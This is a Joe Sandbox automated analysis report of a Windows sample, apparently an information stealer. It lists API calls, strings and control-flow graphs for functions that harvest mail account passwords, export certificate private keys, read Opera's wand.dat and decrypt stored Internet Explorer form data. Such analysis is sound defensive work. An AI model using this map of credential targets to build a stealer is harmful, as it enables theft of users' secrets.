InternetCrackUrlA 11375 403ca2 11374->11375 11376 403ca8 11374->11376 11375->11376 11377 403cad InternetCreateUrlA 11375->11377 11378 4018a0 LocalFree 11376->11378 11377->11376 11379 403cd2 InternetCrackUrlA 11377->11379 11380 403db2 11378->11380 11379->11376 11381 403d13 11379->11381 11382 4018a0 LocalFree 11380->11382 11381->11376 11383 403d1e wsprintfA 11381->11383 11384 403dba 11382->11384 11385 403641 5 API calls 11383->11385 11386 4018a0 LocalFree 11384->11386 11387 403d46 11385->11387 11388 403dc2 11386->11388 11387->11376 11403 403bf8 setsockopt 11387->11403 11390 403dd0 GlobalUnlock 11388->11390 11392 4018a0 LocalFree 11388->11392 11390->11347 11392->11390 11400->11370 11401->11372 11402->11374 11404->11363

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E9E1
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EA15
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040ECD0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                • API String ID: 1332880857-2111798378
                                                • Opcode ID: 785a58eeefe31ad8fbd2d6d96509cd82f682391f0b261f4875770061519bbba3
                                                • Instruction ID: 8c726dbd4774d9faecc101f25245ec10e744d92cea1909c51a74287b2a7dd414
                                                • Opcode Fuzzy Hash: 785a58eeefe31ad8fbd2d6d96509cd82f682391f0b261f4875770061519bbba3
                                                • Instruction Fuzzy Hash: 8071823190011CBADF226F51CC42BDDBAB6BF04704F5485FAB588741B1DB7A5BA1AF88

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 214 40d1e9-40d207 call 4015d8 217 40d3da-40d3e8 call 40161e 214->217 218 40d20d-40d214 214->218 218->217 219 40d21a-40d221 218->219 219->217 222 40d227-40d22e 219->222 222->217 223 40d234-40d23b 222->223 223->217 224 40d241-40d248 223->224 224->217 225 40d24e-40d255 224->225 225->217 226 40d25b-40d262 225->226 226->217 227 40d268-40d27c CertOpenSystemStoreA 226->227 227->217 228 40d282 227->228 229 40d284-40d292 CertEnumCertificatesInStore 228->229 230 40d294-40d3d4 CertCloseStore 229->230 231 40d299-40d2a7 229->231 230->217 232 40d3ca 231->232 233 40d2ad 231->233 232->229 235 40d3c0-40d3c4 233->235 235->232 236 40d2b2-40d2c0 lstrcmpA 235->236 237 40d2c6-40d2ca 236->237 238 40d3ba-40d3bd 236->238 237->238 239 40d2d0-40d2f8 call 4018b7 call 4018ee lstrcmpA 237->239 238->235 244 40d3b2-40d3b5 call 4018a0 239->244 245 40d2fe-40d315 CryptAcquireCertificatePrivateKey 239->245 244->238 245->244 247 40d31b-40d32d CryptGetUserKey 245->247 248 40d3a7-40d3ac CryptReleaseContext 247->248 249 40d32f-40d346 CryptExportKey 247->249 248->244 250 40d348-40d36b call 4018b7 CryptExportKey 249->250 251 40d39e-40d3a1 CryptDestroyKey 249->251 254 40d396-40d399 call 4018a0 250->254 255 40d36d-40d391 call 401551 call 401587 * 2 250->255 251->248 254->251 255->254
                                                APIs
                                                • CertOpenSystemStoreA.CRYPT32(00000000,00416910), ref: 0040D26F
                                                • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D288
                                                • lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D2B9
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • lstrcmpA.KERNEL32(?,0041691D,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D2F1
                                                • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D30D
                                                • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D325
                                                • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D33E
                                                • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D363
                                                • CryptDestroyKey.ADVAPI32(?), ref: 0040D3A1
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D3AC
                                                • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D3D4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                                                • String ID: 2.5.29.37
                                                • API String ID: 2649496969-3842544949
                                                • Opcode ID: c5114772601b71a796970ff310554d6a2d8f48e332c3122745ba0f371867faaa
                                                • Instruction ID: 0743195cb9407e63814cae69e5eae370ec95d05dd175c9e397db8b5294eaa1a5
                                                • Opcode Fuzzy Hash: c5114772601b71a796970ff310554d6a2d8f48e332c3122745ba0f371867faaa
                                                • Instruction Fuzzy Hash: 28513631900209EBDF21AB91DD09BEEBB71BB44305F108436FA01B51F0DBB99A94DB99

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 262 404cb4-404ccc 263 404cd3 262->263 264 404cce-404cd1 262->264 266 404e31-404e3d call 4018a0 263->266 264->263 265 404cd8-404ce2 call 4023f0 264->265 271 404cf3-404cfb call 401c3f 265->271 272 404ce4-404cf1 call 401c3f 265->272 275 404d00-404d30 call 4018ce FindFirstFileA 271->275 272->275 275->266 279 404d36-404d42 275->279 280 404d44-404d54 lstrcmpiA 279->280 281 404da9-404dc4 StrStrIA 279->281 284 404d56 280->284 285 404d5b-404d71 lstrcmpiA 280->285 282 404dc6-404de5 call 401c3f call 401c93 281->282 283 404e0c-404e20 FindNextFileA 281->283 296 404df4 282->296 297 404de7-404df2 StrStrIA 282->297 283->279 286 404e26-404e2c FindClose 283->286 284->283 288 404d73 285->288 289 404d78-404da7 call 401c3f call 401c93 call 404cb4 call 4018a0 285->289 286->266 288->283 289->283 299 404df9-404dfc 296->299 297->299 301 404e07 call 4018a0 299->301 302 404dfe-404e02 call 404c9d 299->302 301->283 302->301
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00404D24
                                                • lstrcmpiA.KERNEL32(00415055,?), ref: 00404D4D
                                                • lstrcmpiA.KERNEL32(00415057,?), ref: 00404D6A
                                                • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404E19
                                                • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404E2C
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                                  • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                                  • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                • String ID: *.*$.ini$Sites\$\*.*
                                                • API String ID: 3040542784-999409347
                                                • Opcode ID: c38aa778b78583dc169d189965d814ac73bb2b3f1bfc0c0d2154c6b94fb836b0
                                                • Instruction ID: 53212278e162caab68307d911e5e2161714549b8965e294e943a6f8d6c804a8c
                                                • Opcode Fuzzy Hash: c38aa778b78583dc169d189965d814ac73bb2b3f1bfc0c0d2154c6b94fb836b0
                                                • Instruction Fuzzy Hash: 283177B0900209AAEF20BF61CC41BEE7765AF80344F1045B7B618B50F1DB7C8ED19E99

                                                Control-flow Graph

                                                APIs
                                                • GetVersionExA.KERNEL32(0000009C), ref: 00404487
                                                • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 0040450C
                                                • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404535
                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004045EA
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404609
                                                • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404619
                                                • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404627
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                                                • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                                                • API String ID: 1787888500-92997708
                                                • Opcode ID: 105c1e16622b580bb76dfab31229c71a1d459e57b962d1558819dc564426b42a
                                                • Instruction ID: 54daddef61dc0d57abe52263334e6522858395e6adfb0adf8a9ca9f7f261cb3d
                                                • Opcode Fuzzy Hash: 105c1e16622b580bb76dfab31229c71a1d459e57b962d1558819dc564426b42a
                                                • Instruction Fuzzy Hash: B75143B1A00218BEEF217BA1CC42F9D7A75AF85304F1080BAB749790E1D7B94ED19B59
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00408974
                                                • lstrcmpiA.KERNEL32(00415055,?), ref: 004089A7
                                                • lstrcmpiA.KERNEL32(00415057,?), ref: 004089C1
                                                • StrStrIA.SHLWAPI(?,opera,00000000,00415057,?,00415055,?,00000000,?), ref: 00408A06
                                                • FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408A34
                                                • FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408A47
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                • String ID: \*.*$opera$wand.dat
                                                • API String ID: 3663067366-3278183560
                                                • Opcode ID: 25419e5fb79d701962baf81079d42c8c31f8be95b4c22e1b7b98c42a2fbdd549
                                                • Instruction ID: 1292869286f6aa5ad5b74fb1777e740303319ab58e0dacca6709bcf4709224e2
                                                • Opcode Fuzzy Hash: 25419e5fb79d701962baf81079d42c8c31f8be95b4c22e1b7b98c42a2fbdd549
                                                • Instruction Fuzzy Hash: B4311070A1021DAAEF21AB61CD42BED77B5AF44344F0040BBB548B51E1DBB89FC09F59
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00404057
                                                • lstrcmpiA.KERNEL32(00415055,?), ref: 00404084
                                                • lstrcmpiA.KERNEL32(00415057,?), ref: 004040A1
                                                • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 0040416B
                                                • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 0040417E
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                                  • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                                  • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                • String ID: *.*$\*.*
                                                • API String ID: 3040542784-1692270452
                                                • Opcode ID: bce5784b6e4e3bf5e58f129bfec1ca9c13503689606921eead280abf7e7915bc
                                                • Instruction ID: 02411585a0055aa8577641acd59ff52c6a4e0200cbc9bb9f9c255671042f85ff
                                                • Opcode Fuzzy Hash: bce5784b6e4e3bf5e58f129bfec1ca9c13503689606921eead280abf7e7915bc
                                                • Instruction Fuzzy Hash: BA4173B090021DAADF21AF61CC45AEE3B69AF44344F1044B7BA08B51F1DB7D8ED19B59
                                                APIs
                                                • lstrlenW.KERNEL32(?), ref: 0040A556
                                                • wsprintfA.USER32 ref: 0040A5D5
                                                • lstrlenW.KERNEL32(?,?), ref: 0040A61B
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A65E
                                                • LocalFree.KERNEL32(00000000), ref: 0040A695
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                                                • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                • API String ID: 1926481713-2450551051
                                                • Opcode ID: 6687cb46167be396fc73b72414022b3e59988b1b8b774ffa9fd120910d5e0352
                                                • Instruction ID: e7da959e478f93c506f5d2c0960b00d418dc9502b93bc1482488adf77b4b25bf
                                                • Opcode Fuzzy Hash: 6687cb46167be396fc73b72414022b3e59988b1b8b774ffa9fd120910d5e0352
                                                • Instruction Fuzzy Hash: BD414C72C10218EADF11AFE4DC45AEEBB79FF08304F14413AF910B51A1E7798A65CB59
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00405093
                                                • lstrcmpiA.KERNEL32(00415055,?), ref: 004050C2
                                                • lstrcmpiA.KERNEL32(00415057,?), ref: 004050DC
                                                • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 00405134
                                                • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00405147
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                • String ID: \*.*
                                                • API String ID: 3663067366-1173974218
                                                • Opcode ID: 87de5b8274b2caff27159ee54e47f409e4e0e356cc23b78c937b7958fab01303
                                                • Instruction ID: 834c9d3c2c78b33e99752c9c166540e6dae11a61d4067108a158aef7cec98cef
                                                • Opcode Fuzzy Hash: 87de5b8274b2caff27159ee54e47f409e4e0e356cc23b78c937b7958fab01303
                                                • Instruction Fuzzy Hash: 39311C7190061DAAEF20AF61CC42BEE77A9EF04348F0044BBB508A50E1D7789FD19F99
                                                APIs
                                                • CoCreateInstance.OLE32(00416390,00000000,00000005,004163A0,?), ref: 0040A6C7
                                                • StrStrIW.SHLWAPI(00000000,004163C0), ref: 0040A73E
                                                • CoTaskMemFree.OLE32(00000000,00000000,004163C0), ref: 0040A769
                                                • CoTaskMemFree.OLE32(00000000,00000000,00000000,004163C0), ref: 0040A777
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeTask$CreateInstance
                                                • String ID: (
                                                • API String ID: 2903366249-3887548279
                                                • Opcode ID: cb085d952d8794f266467bdc99fb6f19944fc93456d203f69582ebde3a6e8537
                                                • Instruction ID: 789ef5e1365dd3a863c2a9b3f4e84455522ab1bc0cb14278e1797625d710eefd
                                                • Opcode Fuzzy Hash: cb085d952d8794f266467bdc99fb6f19944fc93456d203f69582ebde3a6e8537
                                                • Instruction Fuzzy Hash: 4E21F834900209EBDF11DFA0D885BDEFB75BF08314F208166E500B62A0D379DAD5DB59
                                                APIs
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004027EA
                                                • GetCurrentProcess.KERNEL32 ref: 004027F4
                                                • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 00402802
                                                • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00402844
                                                • CloseHandle.KERNEL32(00000000), ref: 00402858
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                • String ID:
                                                • API String ID: 3038321057-0
                                                • Opcode ID: dde7ea956e658703046f87e9b5c1a38fcc19954aa189818e35cee70bb4b8f4de
                                                • Instruction ID: 01ad4f55613d3ea6422f9a86c03aeb724ea44c67199d940a9270a11835675535
                                                • Opcode Fuzzy Hash: dde7ea956e658703046f87e9b5c1a38fcc19954aa189818e35cee70bb4b8f4de
                                                • Instruction Fuzzy Hash: D4114936A00209EBEB119F94DD49BEE7BB4BB04308F108236A521B51E0D7F89684CB58
                                                APIs
                                                • OleInitialize.OLE32 ref: 0041022F
                                                • GetUserNameA.ADVAPI32(?,00000101), ref: 0041027F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InitializeNameUser
                                                • String ID: cryptimplus
                                                • API String ID: 2272643758-1201002197
                                                • Opcode ID: 1c3fafd625b67e8e383e866f4f4dafc8120124f5b6aa2911144f85fa4c9997ce
                                                • Instruction ID: 317a1e0ec906bcb10e5b0db5419b055487d24f8e909fbf7fefcc2bccf12ee03c
                                                • Opcode Fuzzy Hash: 1c3fafd625b67e8e383e866f4f4dafc8120124f5b6aa2911144f85fa4c9997ce
                                                • Instruction Fuzzy Hash: 72F058316042119ADB60BBB2AD4AACC3AB05B8834CF10803FB204B45E3DFFC8984962D
                                                APIs
                                                • LoadLibraryA.KERNEL32(?), ref: 00402326
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00402354
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID:
                                                • API String ID: 2574300362-0
                                                • Opcode ID: c565f1aa3f4fda05442a02a35214380c9171b068020167273cef74c294764032
                                                • Instruction ID: 1dfa1c1e5af10fc35452843b0631d1bd73dd53e789340300057ab7dd164a1ecb
                                                • Opcode Fuzzy Hash: c565f1aa3f4fda05442a02a35214380c9171b068020167273cef74c294764032
                                                • Instruction Fuzzy Hash: 64F0907320510926D7105539AD4899BAB88E7D3378B145137ED55E62C0E1BDDD81C2A4
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 004102E3
                                                • RevertToSelf.ADVAPI32 ref: 0041030E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterRevertSelfUnhandled
                                                • String ID:
                                                • API String ID: 669012916-0
                                                • Opcode ID: 151815d16c6c1aeafd6ab2c882df4848eca902d9783ddc0210315193b629acf5
                                                • Instruction ID: acfa340ed9a42553c751a17bf592bb099c6bee29d1dd991464ace7cdab821f56
                                                • Opcode Fuzzy Hash: 151815d16c6c1aeafd6ab2c882df4848eca902d9783ddc0210315193b629acf5
                                                • Instruction Fuzzy Hash: D0D0E2341140068ACA357BB2E80A3D93A60AB8930CF44807FA458145A38BBD44CACA3E
                                                APIs
                                                  • Part of subcall function 00403711: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403756
                                                • recv.WSOCK32(?,?,00000001,00000000), ref: 004037A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recvselect
                                                • String ID:
                                                • API String ID: 741273618-0
                                                • Opcode ID: 261567ad06b867bf94bed59ea578e3ef6015e5490e128b2dbe9a0ec4694b4c90
                                                • Instruction ID: 36e3ef43c85e50d9de3c0b06458be73d01a7fe9bd21fe244589f68d1cd890585
                                                • Opcode Fuzzy Hash: 261567ad06b867bf94bed59ea578e3ef6015e5490e128b2dbe9a0ec4694b4c90
                                                • Instruction Fuzzy Hash: 840171F034420ABFEB119E50CC81B9A3F6DAB01346F108237BA01BB1D1D775EE558759
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: >D@
                                                • API String ID: 0-863885849
                                                • Opcode ID: 57e17693c71cf3a222b732756e11a97b0aea5370aad12a079381cb740442f73b
                                                • Instruction ID: f1efd764739a1e0095d7b3feafbbcd457dd67903410fd2921a3bc984e7b33acd
                                                • Opcode Fuzzy Hash: 57e17693c71cf3a222b732756e11a97b0aea5370aad12a079381cb740442f73b
                                                • Instruction Fuzzy Hash: 8E11CE32408284EFCB229F04DC02B993F71EB05B10F108033F406A6DE2C33D4965DA4E

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00405885
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004058B5
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
